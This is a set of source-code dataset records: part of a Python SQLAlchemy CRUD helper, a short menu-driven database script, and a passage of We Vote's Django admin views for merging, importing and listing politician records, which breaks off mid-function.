query_obj is None:\n raise BusinessException(\"数据不存在\")\n setattr(query_obj, 'del_flag', DeleteEnum.yes.value)\n setattr(query_obj, 'update_time', datetime.now())\n if user:\n setattr(query_obj, 'update_id', user['id'])\n setattr(query_obj, 'update_name', user['username'])\n session.commit()\n # session.refresh(query_obj)\n return query_obj\n\n @classmethod\n @connect\n def get_with_count(cls, session: Session, **kwargs):\n \"\"\"\n 统计数据\n :param session: 会话\n :param kwargs:\n :return:\n \"\"\"\n query = cls.query_wrapper(session, **kwargs)\n return query.group_by(cls.model.id).count() if getattr(cls.model, 'id', None) else query.count()","repo_name":"JokerChat/FunDataFactory","sub_path":"app/crud/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9966,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"70"}
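A hypothetical usage sketch for the BaseCrud record above. The User model and the SQLAlchemy wiring are assumptions for illustration (the project's real models subclass FunBaseModel and sessions come from app.models); only the `model = ...` hook and the call shapes mirror the record. Assumes SQLAlchemy 1.4+.

from sqlalchemy import Column, Integer, String
from sqlalchemy.orm import declarative_base

from app.crud import BaseCrud  # the module shown in the record above

Base = declarative_base()

class User(Base):
    # Illustrative table; in the real project this would derive from FunBaseModel,
    # which is what provides the del_flag / update_id / update_name semantics.
    __tablename__ = "user"
    id = Column(Integer, primary_key=True)
    username = Column(String(64))
    del_flag = Column(Integer, default=0)  # soft-delete flag consulted by __filter_k_v

class UserCrud(BaseCrud):
    model = User  # the only hook a subclass needs to provide

# @connect opens a session automatically, so callers only pass filters:
# rows = UserCrud.get_with_params(username="%jo%")              # fuzzy match via the % convention
# total, page = UserCrud.get_with_pagination(page=1, limit=10)  # (count, page of rows)
# found = UserCrud.get_with_existed(username="joker")           # EXISTS subquery -> bool
# row = UserCrud.delete_by_id(id=1, user={"id": 1, "username": "admin"})  # soft delete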
+{"seq_id":"5636210851","text":"from pyconnector import connect_to_database\r\nfrom select_data import select\r\nfrom insert_data import insert\r\nfrom update_data import update\r\nfrom delt_data import delete\r\n\r\nmydb = connect_to_database()\r\n\r\ninsert_choose = input(\"--------What do you want to do?? Pls choose------- \\n 1.Insert\\n 2.Update\\n 3.Select\\n 4.Delete\\n Input here : \")\r\nif insert_choose.lower() == \"insert\":\r\n insert()\r\nelif insert_choose.lower() == \"update\":\r\n update()\r\nelif insert_choose.lower() == \"select\":\r\n select()\r\nelif insert_choose.lower() == \"delete\":\r\n delete() \r\nelse:\r\n print (\"Iced Americano\")\r\n\r\n \r\n","repo_name":"SiriMix19/PY","sub_path":"PY/NewSQL/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"14020620742","text":"# politician/views_admin.py\n# Brought to you by We Vote. Be good.\n# -*- coding: UTF-8 -*-\nimport re\nfrom base64 import b64encode\nimport json\nimport string\nfrom datetime import datetime, timedelta\nimport pytz\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.messages import get_messages\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models import F, Q\nfrom django.db.models.functions import Length\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.utils.timezone import localtime, now\nfrom django.urls import reverse\nimport wevote_functions.admin\nfrom admin_tools.views import redirect_to_sign_in_page\nfrom campaign.models import CampaignXManager\nfrom candidate.controllers import retrieve_candidate_photos\nfrom candidate.models import CandidateCampaign, CandidateListManager, CandidateManager, PROFILE_IMAGE_TYPE_FACEBOOK, \\\n PROFILE_IMAGE_TYPE_TWITTER, PROFILE_IMAGE_TYPE_UNKNOWN, \\\n PROFILE_IMAGE_TYPE_UPLOADED, PROFILE_IMAGE_TYPE_VOTE_USA\nfrom config.base import get_environment_variable\nfrom election.models import Election\nfrom exception.models import handle_record_found_more_than_one_exception, \\\n handle_record_not_found_exception, handle_record_not_saved_exception, print_to_log\nfrom image.controllers import create_resized_images\nfrom import_export_vote_smart.models import VoteSmartRatingOneCandidate\nfrom import_export_vote_smart.votesmart_local import VotesmartApiError\nfrom office.models import ContestOffice\nfrom politician.controllers import generate_campaignx_for_politician, politician_save_photo_from_file_reader, \\\n update_politician_details_from_candidate\nfrom position.models import PositionEntered, PositionListManager\nfrom representative.models import Representative, RepresentativeManager\nfrom voter.models import voter_has_authority\nfrom wevote_functions.functions import convert_date_to_we_vote_date_string, convert_to_int, \\\n convert_to_political_party_constant, convert_we_vote_date_string_to_date_as_integer, \\\n extract_first_name_from_full_name, extract_instagram_handle_from_text_string, \\\n extract_middle_name_from_full_name, \\\n extract_last_name_from_full_name, extract_twitter_handle_from_text_string, \\\n positive_value_exists, STATE_CODE_MAP, display_full_name_with_correct_capitalization\nfrom wevote_settings.constants import IS_BATTLEGROUND_YEARS_AVAILABLE\nfrom .controllers import add_alternate_names_to_next_spot, add_twitter_handle_to_next_politician_spot, \\\n fetch_duplicate_politician_count, figure_out_politician_conflict_values, find_duplicate_politician, \\\n merge_if_duplicate_politicians, merge_these_two_politicians, politicians_import_from_master_server\nfrom .models import Politician, PoliticianManager, POLITICIAN_UNIQUE_ATTRIBUTES_TO_BE_CLEARED, \\\n POLITICIAN_UNIQUE_IDENTIFIERS, PoliticiansArePossibleDuplicates, POLITICAL_DATA_MANAGER, UNKNOWN\n\nPOLITICIANS_SYNC_URL = get_environment_variable(\"POLITICIANS_SYNC_URL\") # politiciansSyncOut\nWE_VOTE_SERVER_ROOT_URL = get_environment_variable(\"WE_VOTE_SERVER_ROOT_URL\")\nWEB_APP_ROOT_URL = get_environment_variable(\"WEB_APP_ROOT_URL\")\n\nlogger = wevote_functions.admin.get_logger(__name__)\n\n\n@login_required\ndef compare_two_politicians_for_merge_view(request):\n status = ''\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, 
verified_volunteer\n authority_required = {'political_data_manager'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n politician1_we_vote_id = request.GET.get('politician1_we_vote_id', 0)\n politician2_we_vote_id = request.GET.get('politician2_we_vote_id', 0)\n google_civic_election_id = request.GET.get('google_civic_election_id', 0)\n google_civic_election_id = convert_to_int(google_civic_election_id)\n state_code = request.GET.get('state_code', '')\n\n politician_manager = PoliticianManager()\n politician_results = politician_manager.retrieve_politician(\n politician_we_vote_id=politician1_we_vote_id,\n read_only=True)\n if not politician_results['politician_found']:\n messages.add_message(request, messages.ERROR, \"Politician1 not found.\")\n return HttpResponseRedirect(\n reverse('politician:politician_list', args=()) +\n \"?google_civic_election_id=\" + str(google_civic_election_id) +\n \"&state_code=\" + str(state_code))\n\n politician_option1_for_template = politician_results['politician']\n\n politician_results = politician_manager.retrieve_politician(\n politician_we_vote_id=politician2_we_vote_id,\n read_only=True)\n if not politician_results['politician_found']:\n messages.add_message(request, messages.ERROR, \"Politician2 not found.\")\n return HttpResponseRedirect(\n reverse('politician:politician_edit', args=(politician_option1_for_template.id,)) +\n \"?google_civic_election_id=\" + str(google_civic_election_id) +\n \"&state_code=\" + str(state_code))\n\n politician_option2_for_template = politician_results['politician']\n\n if politician1_we_vote_id == politician2_we_vote_id:\n messages.add_message(request, messages.ERROR, \"These politicians are already merged.\")\n return HttpResponseRedirect(\n reverse('politician:politician_edit', args=(politician_option1_for_template.id,)) +\n \"?google_civic_election_id=\" + str(google_civic_election_id) +\n \"&state_code=\" + str(state_code))\n\n conflict_results = figure_out_politician_conflict_values(\n politician_option1_for_template, politician_option2_for_template)\n politician_merge_conflict_values = conflict_results['politician_merge_conflict_values']\n if not conflict_results['success']:\n status += conflict_results['status']\n messages.add_message(request, messages.ERROR, status)\n\n # This view function takes us to displaying a template\n remove_duplicate_process = False # Do not try to find another office to merge after finishing\n return render_politician_merge_form(\n request,\n politician_option1_for_template,\n politician_option2_for_template,\n politician_merge_conflict_values,\n remove_duplicate_process)\n\n\n@login_required\ndef find_and_merge_duplicate_politicians_view(request):\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'verified_volunteer'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n find_number_of_duplicates = request.GET.get('find_number_of_duplicates', 0)\n state_code = request.GET.get('state_code', \"\")\n politician_manager = PoliticianManager()\n\n queryset = PoliticiansArePossibleDuplicates.objects.using('readonly').all()\n if positive_value_exists(state_code):\n queryset = queryset.filter(state_code__iexact=state_code)\n queryset_politician1 = queryset.values_list('politician1_we_vote_id', flat=True).distinct()\n exclude_politician1_we_vote_id_list = 
list(queryset_politician1)\n    queryset_politician2 = queryset.values_list('politician2_we_vote_id', flat=True).distinct()\n    exclude_politician2_we_vote_id_list = list(queryset_politician2)\n    exclude_politician_we_vote_id_list = \\\n        list(set(exclude_politician1_we_vote_id_list + exclude_politician2_we_vote_id_list))\n\n    politician_query = Politician.objects.using('readonly').all()\n    politician_query = politician_query.exclude(we_vote_id__in=exclude_politician_we_vote_id_list)\n    if positive_value_exists(state_code):\n        politician_query = politician_query.filter(state_code__iexact=state_code)\n    politician_list = list(politician_query)\n\n    # Loop through all the politicians to see how many have possible duplicates\n    if positive_value_exists(find_number_of_duplicates):\n        ignore_politician_id_list = []\n        duplicate_politician_count = 0\n        for we_vote_politician in politician_list:\n            # Note that we don't reset ignore_politician_id_list, so we don't search for a duplicate in both directions\n            ignore_politician_id_list.append(we_vote_politician.we_vote_id)\n            duplicate_politician_count_temp = fetch_duplicate_politician_count(\n                we_vote_politician, ignore_politician_id_list)\n            duplicate_politician_count += duplicate_politician_count_temp\n\n        if positive_value_exists(duplicate_politician_count):\n            messages.add_message(request, messages.INFO,\n                                 \"There are approximately {duplicate_politician_count} \"\n                                 \"possible duplicates.\"\n                                 \"\".format(duplicate_politician_count=duplicate_politician_count))\n\n    # Loop through all the politicians in this election\n    for we_vote_politician in politician_list:\n        if we_vote_politician.we_vote_id in exclude_politician_we_vote_id_list:\n            continue\n        # Start ignore list with all the politicians already reviewed\n        ignore_politician_id_list = exclude_politician_we_vote_id_list\n        # Add current politician entry to ignore list\n        ignore_politician_id_list.append(we_vote_politician.we_vote_id)\n        # Now check for other politicians we have labeled as \"not a duplicate\"\n        not_a_duplicate_list = politician_manager.fetch_politicians_are_not_duplicates_list_we_vote_ids(\n            we_vote_politician.we_vote_id)\n\n        ignore_politician_id_list += not_a_duplicate_list\n\n        results = find_duplicate_politician(we_vote_politician, ignore_politician_id_list)\n\n        # If we find politicians to merge, stop and ask for confirmation\n        if results['politician_merge_possibility_found']:\n            politician_option1_for_template = we_vote_politician\n            politician_option2_for_template = results['politician_merge_possibility']\n\n            # Can we automatically merge these politicians?\n            merge_results = merge_if_duplicate_politicians(\n                politician_option1_for_template,\n                politician_option2_for_template,\n                results['politician_merge_conflict_values'])\n\n            if merge_results['politicians_merged']:\n                politician = merge_results['politician']\n                if politician.we_vote_id not in exclude_politician_we_vote_id_list:\n                    exclude_politician_we_vote_id_list.append(politician.we_vote_id)\n                if we_vote_politician.we_vote_id not in exclude_politician_we_vote_id_list:\n                    exclude_politician_we_vote_id_list.append(we_vote_politician.we_vote_id)\n                PoliticiansArePossibleDuplicates.objects.create(\n                    politician1_we_vote_id=politician.we_vote_id,\n                    politician2_we_vote_id=None,\n                    state_code=state_code,\n                )\n                PoliticiansArePossibleDuplicates.objects.create(\n                    politician1_we_vote_id=we_vote_politician.we_vote_id,\n                    politician2_we_vote_id=None,\n                    state_code=state_code,\n                )\n                messages.add_message(request, messages.INFO, \"Politician {politician_name} automatically 
merged.\"\n \"\".format(politician_name=politician.politician_name))\n # No need to start over\n # return HttpResponseRedirect(reverse('politician:find_and_merge_duplicate_politicians', args=()) +\n # \"?state_code=\" + str(state_code))\n else:\n # Add an entry showing that this is a possible match\n PoliticiansArePossibleDuplicates.objects.create(\n politician1_we_vote_id=we_vote_politician.we_vote_id,\n politician2_we_vote_id=politician_option2_for_template.we_vote_id,\n state_code=state_code,\n )\n if politician_option2_for_template.we_vote_id not in exclude_politician_we_vote_id_list:\n exclude_politician_we_vote_id_list.append(politician_option2_for_template.we_vote_id)\n else:\n # No matches found\n PoliticiansArePossibleDuplicates.objects.create(\n politician1_we_vote_id=we_vote_politician.we_vote_id,\n politician2_we_vote_id=None,\n state_code=state_code,\n )\n\n return HttpResponseRedirect(reverse('politician:duplicates_list', args=()) +\n \"?state_code={state_code}\"\n \"\".format(state_code=state_code))\n\n\ndef render_politician_merge_form(\n request,\n politician_option1_for_template,\n politician_option2_for_template,\n politician_merge_conflict_values,\n remove_duplicate_process=True):\n candidate_list_manager = CandidateListManager()\n\n state_code = ''\n if hasattr(politician_option1_for_template, 'state_code'):\n state_code = politician_option1_for_template.state_code\n if hasattr(politician_option2_for_template, 'state_code'):\n state_code = politician_option2_for_template.state_code\n\n # Get info about candidates linked to each politician\n politician1_linked_candidates_count = 0\n politician1_linked_candidate_district_names = ''\n politician1_linked_candidate_names = ''\n politician1_linked_candidate_offices = ''\n politician1_linked_candidate_photos = []\n politician1_candidate_results = candidate_list_manager.retrieve_candidates_from_politician(\n politician_id=politician_option1_for_template.id,\n politician_we_vote_id=politician_option1_for_template.we_vote_id,\n read_only=True)\n if politician1_candidate_results['candidate_list_found']:\n is_first = True\n is_first_office = True\n for one_candidate in politician1_candidate_results['candidate_list']:\n politician1_linked_candidates_count += 1\n if is_first:\n is_first = False\n else:\n politician1_linked_candidate_names += ', '\n politician1_linked_candidate_names += one_candidate.candidate_name\n if positive_value_exists(one_candidate.candidate_year):\n politician1_linked_candidate_names += ' (' + str(one_candidate.candidate_year) + ')'\n if positive_value_exists(one_candidate.we_vote_hosted_profile_image_url_large):\n politician1_linked_candidate_photos.append(one_candidate.we_vote_hosted_profile_image_url_large)\n results = candidate_list_manager.retrieve_all_offices_for_candidate(\n candidate_we_vote_id=one_candidate.we_vote_id,\n read_only=True)\n if results['office_list_found']:\n for one_office in results['office_list']:\n if is_first_office:\n is_first_office = False\n else:\n politician1_linked_candidate_offices += ', '\n politician1_linked_candidate_district_names += ', '\n politician1_linked_candidate_offices += one_office.office_name\n politician1_linked_candidate_district_names += str(one_office.district_name)\n politician_option1_for_template.linked_candidates_count = politician1_linked_candidates_count\n politician_option1_for_template.linked_candidate_district_names = politician1_linked_candidate_district_names\n politician_option1_for_template.linked_candidate_names = 
politician1_linked_candidate_names\n politician_option1_for_template.linked_candidate_offices = politician1_linked_candidate_offices\n politician_option1_for_template.linked_candidate_photos = politician1_linked_candidate_photos\n\n politician2_linked_candidates_count = 0\n politician2_linked_candidate_district_names = ''\n politician2_linked_candidate_names = ''\n politician2_linked_candidate_offices = ''\n politician2_linked_candidate_photos = []\n politician2_candidate_results = candidate_list_manager.retrieve_candidates_from_politician(\n politician_id=politician_option2_for_template.id,\n politician_we_vote_id=politician_option2_for_template.we_vote_id,\n read_only=True)\n if politician2_candidate_results['candidate_list_found']:\n is_first = True\n is_first_office = True\n for one_candidate in politician2_candidate_results['candidate_list']:\n politician2_linked_candidates_count += 1\n if is_first:\n is_first = False\n else:\n politician2_linked_candidate_names += ', '\n politician2_linked_candidate_names += one_candidate.candidate_name\n if positive_value_exists(one_candidate.candidate_year):\n politician2_linked_candidate_names += ' (' + str(one_candidate.candidate_year) + ')'\n if positive_value_exists(one_candidate.we_vote_hosted_profile_image_url_large):\n politician2_linked_candidate_photos.append(one_candidate.we_vote_hosted_profile_image_url_large)\n results = candidate_list_manager.retrieve_all_offices_for_candidate(\n candidate_we_vote_id=one_candidate.we_vote_id,\n read_only=True)\n if results['office_list_found']:\n for one_office in results['office_list']:\n if is_first_office:\n is_first_office = False\n else:\n politician2_linked_candidate_offices += ', '\n politician2_linked_candidate_district_names += ', '\n politician2_linked_candidate_offices += one_office.office_name\n politician2_linked_candidate_district_names += str(one_office.district_name)\n politician_option2_for_template.linked_candidates_count = politician2_linked_candidates_count\n politician_option2_for_template.linked_candidate_district_names = politician2_linked_candidate_district_names\n politician_option2_for_template.linked_candidate_names = politician2_linked_candidate_names\n politician_option2_for_template.linked_candidate_offices = politician2_linked_candidate_offices\n politician_option2_for_template.linked_candidate_photos = politician2_linked_candidate_photos\n\n messages_on_stage = get_messages(request)\n template_values = {\n 'conflict_values': politician_merge_conflict_values,\n 'messages_on_stage': messages_on_stage,\n 'politician_option1': politician_option1_for_template,\n 'politician_option2': politician_option2_for_template,\n 'remove_duplicate_process': remove_duplicate_process,\n 'state_code': state_code,\n }\n return render(request, 'politician/politician_merge.html', template_values)\n\n\n@login_required\ndef politicians_import_from_master_server_view(request):\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'admin'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n if WE_VOTE_SERVER_ROOT_URL in POLITICIANS_SYNC_URL:\n messages.add_message(request, messages.ERROR, \"Cannot sync with Master We Vote Server -- \"\n \"this is the Master We Vote Server.\")\n return HttpResponseRedirect(reverse('admin_tools:admin_home', args=()))\n\n google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 
0))\n    state_code = request.GET.get('state_code', '')\n\n    results = politicians_import_from_master_server(request, state_code)\n\n    if not results['success']:\n        if 'POLITICIAN_LIST_MISSING' in results['status']:\n            messages.add_message(request, messages.INFO,\n                                 'Politician import completed, and it returned no politicians, but this is not '\n                                 'necessarily a problem! It might be that there are no local politicians running for office '\n                                 'in this election.')\n        else:\n            messages.add_message(request, messages.ERROR, results['status'])\n    else:\n        messages.add_message(request, messages.INFO, 'Politician import completed. '\n                                                     'Saved: {saved}, Updated: {updated}, '\n                                                     'Duplicates skipped: '\n                                                     '{duplicates_removed}, '\n                                                     'Not processed: {not_processed}'\n                                                     ''.format(saved=results['saved'],\n                                                               updated=results['updated'],\n                                                               duplicates_removed=results['duplicates_removed'],\n                                                               not_processed=results['not_processed']))\n    return HttpResponseRedirect(reverse('admin_tools:sync_dashboard', args=()) + \"?google_civic_election_id=\" +\n                                str(google_civic_election_id) + \"&state_code=\" + str(state_code))\n\n\n@login_required\ndef politician_list_view(request):\n    # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n    authority_required = {'partner_organization', 'political_data_viewer', 'verified_volunteer'}\n    if not voter_has_authority(request, authority_required):\n        return redirect_to_sign_in_page(request, authority_required)\n\n    messages_on_stage = get_messages(request)\n    state_code = request.GET.get('state_code', '')\n    politician_search = request.GET.get('politician_search', '')\n    google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))\n    # run_scripts = positive_value_exists(request.GET.get('run_scripts', False))\n    run_scripts = True\n    show_all = positive_value_exists(request.GET.get('show_all', False))\n    show_battleground = positive_value_exists(request.GET.get('show_battleground', False))\n    show_related_candidates = positive_value_exists(request.GET.get('show_related_candidates', False))\n    show_ocd_id_state_mismatch = positive_value_exists(request.GET.get('show_ocd_id_state_mismatch', False))\n    show_politicians_with_email = positive_value_exists(request.GET.get('show_politicians_with_email', False))\n\n    state_list = STATE_CODE_MAP\n    sorted_state_list = sorted(state_list.items())\n\n    # When we were preparing to remove the field 'politician_email_address', we wanted to make sure\n    # they had all been transferred. 
This verifies it.\n # # Are there any entries where politician_email doesn't match politician_email_address?\n # politician_query = Politician.objects.all()\n # politician_query = politician_query.exclude(\n # Q(politician_email_address__isnull=True) |\n # Q(politician_email_address=\"\")\n # )\n # # Do not return entries where the values already match\n # politician_query = politician_query.exclude(politician_email__iexact=F('politician_email_address'))\n # list_found = list(politician_query[:10]) # Only find the first 10 entries\n # if len(list_found) > 0:\n # we_vote_id_string = ''\n # for one_politician in list_found:\n # we_vote_id_string += str(one_politician.we_vote_id) + \" \"\n # messages.add_message(request, messages.ERROR,\n # 'politician_email mismatch with politician_email_address: ' + str(we_vote_id_string))\n\n # Make sure we have a version of the politician's name without a middle initial (for matching endorsements)\n generate_google_civic_name_alternates = True\n number_to_generate = 1000\n if generate_google_civic_name_alternates and positive_value_exists(state_code) and run_scripts:\n politician_query = Politician.objects.all()\n politician_query = politician_query.filter(google_civic_name_alternates_generated=False)\n politician_query = politician_query.filter(state_code__iexact=state_code)\n total_to_convert = politician_query.count()\n total_to_convert_after = total_to_convert - number_to_generate if total_to_convert > number_to_generate else 0\n politician_list_to_convert = list(politician_query[:number_to_generate])\n update_list = []\n updates_needed = False\n updates_made = 0\n for one_politician in politician_list_to_convert:\n results = add_alternate_names_to_next_spot(\n politician=one_politician,\n )\n if results['values_changed']:\n politician = results['politician']\n politician.google_civic_name_alternates_generated = True\n update_list.append(politician)\n updates_needed = True\n updates_made += 1\n elif results['success']:\n one_politician.google_civic_name_alternates_generated = True\n update_list.append(one_politician)\n updates_needed = True\n if updates_needed:\n try:\n Politician.objects.bulk_update(update_list, [\n 'google_civic_name_alternates_generated',\n 'google_civic_candidate_name',\n 'google_civic_candidate_name2',\n 'google_civic_candidate_name3',\n ])\n messages.add_message(request, messages.INFO,\n \"{updates_made:,} google_civic_name_alternates_generated. 
\"\n \"{total_to_convert_after:,} remaining.\"\n \"\".format(total_to_convert_after=total_to_convert_after,\n updates_made=updates_made))\n except Exception as e:\n messages.add_message(request, messages.ERROR,\n \"ERROR with google_civic_name_alternates_generated: {e} \"\n \"\".format(e=e))\n\n # Create seo_friendly_path for all politicians who currently don't have one\n generate_seo_friendly_path_updates = True # Set False on local machine for now\n number_to_create = 1000\n if generate_seo_friendly_path_updates and run_scripts:\n politician_query = Politician.objects.all()\n politician_query = politician_query.filter(\n Q(seo_friendly_path__isnull=True) |\n Q(seo_friendly_path=\"\")\n )\n if positive_value_exists(state_code):\n politician_query = politician_query.filter(state_code__iexact=state_code)\n total_to_convert = politician_query.count()\n total_to_convert_after = total_to_convert - number_to_create if total_to_convert > number_to_create else 0\n politician_list_to_convert = list(politician_query[:number_to_create])\n politician_manager = PoliticianManager()\n update_list = []\n updates_needed = False\n updates_made = 0\n timezone = pytz.timezone(\"America/Los_Angeles\")\n datetime_now = timezone.localize(datetime.now())\n for one_politician in politician_list_to_convert:\n results = politician_manager.generate_seo_friendly_path(\n politician_name=one_politician.politician_name,\n politician_we_vote_id=one_politician.we_vote_id,\n state_code=one_politician.state_code,\n )\n if results['seo_friendly_path_found']:\n one_politician.seo_friendly_path = results['seo_friendly_path']\n one_politician.seo_friendly_path_date_last_updated = datetime_now\n update_list.append(one_politician)\n updates_needed = True\n updates_made += 1\n if updates_needed:\n try:\n Politician.objects.bulk_update(update_list, ['seo_friendly_path', 'seo_friendly_path_date_last_updated'])\n messages.add_message(request, messages.INFO,\n \"{updates_made:,} politicians updated with new seo_friendly_path. 
\"\n \"{total_to_convert_after:,} remaining.\"\n \"\".format(total_to_convert_after=total_to_convert_after,\n updates_made=updates_made))\n except Exception as e:\n messages.add_message(request, messages.ERROR,\n \"ERROR with generate_seo_friendly_path_updates: {e} \"\n \"\".format(e=e))\n\n # Create default CampaignX for all politicians who currently don't have one\n generate_campaignx_for_every_politician = False\n number_to_create = 1000\n if generate_campaignx_for_every_politician and run_scripts:\n politician_query = Politician.objects.all()\n politician_query = politician_query.filter(\n Q(linked_campaignx_we_vote_id__isnull=True) |\n Q(linked_campaignx_we_vote_id=\"\")\n )\n politician_query = politician_query.exclude(\n Q(seo_friendly_path__isnull=True) |\n Q(seo_friendly_path=\"\")\n )\n if positive_value_exists(state_code):\n politician_query = politician_query.filter(state_code__iexact=state_code)\n total_to_convert = politician_query.count()\n total_to_convert_after = total_to_convert - number_to_create if total_to_convert > number_to_create else 0\n politician_list_to_convert = list(politician_query[:number_to_create])\n update_list = []\n updates_needed = False\n updates_made = 0\n timezone = pytz.timezone(\"America/Los_Angeles\")\n datetime_now = timezone.localize(datetime.now())\n for one_politician in politician_list_to_convert:\n results = generate_campaignx_for_politician(\n datetime_now=datetime_now,\n politician=one_politician,\n save_individual_politician=False,\n )\n if results['success'] and results['campaignx_created']:\n one_politician = results['politician']\n update_list.append(one_politician)\n updates_needed = True\n updates_made += 1\n\n if updates_needed:\n try:\n Politician.objects.bulk_update(\n update_list, ['linked_campaignx_we_vote_id', 'linked_campaignx_we_vote_id_date_last_updated'])\n messages.add_message(request, messages.INFO,\n \"Generated CampaignX for {updates_made:,} politicians. 
\"\n \"{total_to_convert_after:,} remaining.\"\n \"\".format(total_to_convert_after=total_to_convert_after,\n updates_made=updates_made))\n except Exception as e:\n messages.add_message(request, messages.ERROR,\n \"ERROR with generate_campaignx_for_every_politician: {e} \"\n \"\".format(e=e))\n\n # Find all politicians with linked_campaignx_we_vote_id and make sure Campaignx\n # entry includes linked_politician_we_vote_id\n # We don't want to always leave this on\n update_campaignx_with_linked_politician_we_vote_id = True\n number_to_update = 7000 # We have to run this routine on the entire state\n if update_campaignx_with_linked_politician_we_vote_id and positive_value_exists(state_code) and run_scripts:\n update_campaignx_with_linked_politician_we_vote_id_status = \"\"\n politician_query = Politician.objects.all()\n politician_query = politician_query.filter(linked_campaignx_we_vote_id__isnull=False)\n politician_query = politician_query.filter(state_code__iexact=state_code)\n total_to_convert = politician_query.count()\n total_to_convert_after = total_to_convert - number_to_update if total_to_convert > number_to_update else 0\n politician_list_to_convert = list(politician_query[:number_to_update])\n campaignx_we_vote_id_list = []\n politician_dict_by_campaign_we_vote_id = {}\n politicians_with_linked_campaignx_we_vote_id_count = 0\n for one_politician in politician_list_to_convert:\n if positive_value_exists(one_politician.linked_campaignx_we_vote_id):\n politicians_with_linked_campaignx_we_vote_id_count += 1\n if one_politician.linked_campaignx_we_vote_id not in campaignx_we_vote_id_list:\n campaignx_we_vote_id_list.append(one_politician.linked_campaignx_we_vote_id)\n politician_dict_by_campaign_we_vote_id[one_politician.linked_campaignx_we_vote_id] = one_politician\n\n update_list = []\n updates_needed = False\n updates_made = 0\n\n from campaign.models import CampaignX\n campaignx_query = CampaignX.objects.all()\n campaignx_query = campaignx_query.filter(we_vote_id__in=campaignx_we_vote_id_list)\n campaignx_list = list(campaignx_query)\n campaignx_with_linked_politician_we_vote_id_count = 0\n for one_campaignx in campaignx_list:\n if one_campaignx.we_vote_id in politician_dict_by_campaign_we_vote_id:\n one_politician = politician_dict_by_campaign_we_vote_id[one_campaignx.we_vote_id]\n if hasattr(one_politician, 'we_vote_id') and positive_value_exists(one_politician.we_vote_id):\n if one_campaignx.linked_politician_we_vote_id != one_politician.we_vote_id:\n one_campaignx.linked_politician_we_vote_id = one_politician.we_vote_id\n update_list.append(one_campaignx)\n updates_made += 1\n if not updates_needed:\n updates_needed = True\n\n if positive_value_exists(one_campaignx.linked_politician_we_vote_id):\n campaignx_with_linked_politician_we_vote_id_count += 1\n\n if updates_needed:\n try:\n CampaignX.objects.bulk_update(\n update_list, ['linked_politician_we_vote_id'])\n update_campaignx_with_linked_politician_we_vote_id_status += \\\n \"UPDATES MADE: {updates_made:,} politicians updated with new linked_campaignx_we_vote_id. 
\" \\\n \"{total_to_convert_after:,} remaining.\" \\\n \"\".format(\n total_to_convert_after=total_to_convert_after,\n updates_made=updates_made)\n except Exception as e:\n update_campaignx_with_linked_politician_we_vote_id_status += \\\n \"ERROR with update_campaignx_with_linked_politician_we_vote_id: {e} \" \\\n \"\".format(e=e)\n elif positive_value_exists(campaignx_with_linked_politician_we_vote_id_count):\n update_campaignx_with_linked_politician_we_vote_id_status += \\\n \"NO UPDATES: {campaignx_with_linked_politician_we_vote_id_count} CampaignX entries \" \\\n \"already have linked_politician_we_vote_id. \" \\\n \"\".format(\n campaignx_with_linked_politician_we_vote_id_count=campaignx_with_linked_politician_we_vote_id_count)\n if positive_value_exists(update_campaignx_with_linked_politician_we_vote_id_status):\n update_campaignx_with_linked_politician_we_vote_id_status = \\\n update_campaignx_with_linked_politician_we_vote_id_status + \\\n \" (SCRIPT update_campaignx_with_linked_politician_we_vote_id) \"\n\n messages.add_message(request, messages.INFO, update_campaignx_with_linked_politician_we_vote_id_status)\n\n politician_list = []\n politician_list_count = 0\n try:\n politician_query = Politician.objects.using('readonly').all()\n if positive_value_exists(show_battleground):\n year_filters = []\n for year_integer in IS_BATTLEGROUND_YEARS_AVAILABLE:\n if positive_value_exists(year_integer):\n is_battleground_race_key = 'is_battleground_race_' + str(year_integer)\n one_year_filter = Q(**{is_battleground_race_key: True})\n year_filters.append(one_year_filter)\n if len(year_filters) > 0:\n # Add the first query\n final_filters = year_filters.pop()\n # ...and \"OR\" the remaining items in the list\n for item in year_filters:\n final_filters |= item\n politician_query = politician_query.filter(final_filters)\n if positive_value_exists(state_code):\n politician_query = politician_query.filter(state_code__iexact=state_code)\n if positive_value_exists(show_politicians_with_email):\n politician_query = \\\n politician_query.annotate(politician_email_address_length=Length('politician_email_address'))\n politician_query = politician_query.annotate(politician_email_length=Length('politician_email'))\n politician_query = politician_query.annotate(politician_email2_length=Length('politician_email2'))\n politician_query = politician_query.annotate(politician_email3_length=Length('politician_email3'))\n politician_query = politician_query.filter(\n Q(politician_email_address_length__gt=2) |\n Q(politician_email_length__gt=2) |\n Q(politician_email2_length__gt=2) |\n Q(politician_email3_length__gt=2)\n )\n if positive_value_exists(show_ocd_id_state_mismatch):\n politician_query = politician_query.filter(ocd_id_state_mismatch_found=True)\n\n if positive_value_exists(politician_search):\n search_words = politician_search.split()\n for one_word in search_words:\n filters = []\n\n new_filter = Q(first_name__iexact=one_word)\n filters.append(new_filter)\n\n new_filter = (\n Q(google_civic_candidate_name__icontains=one_word) |\n Q(google_civic_candidate_name2__icontains=one_word) |\n Q(google_civic_candidate_name3__icontains=one_word)\n )\n filters.append(new_filter)\n\n new_filter = Q(last_name__iexact=one_word)\n filters.append(new_filter)\n\n new_filter = Q(linked_campaignx_we_vote_id__iexact=one_word)\n filters.append(new_filter)\n\n 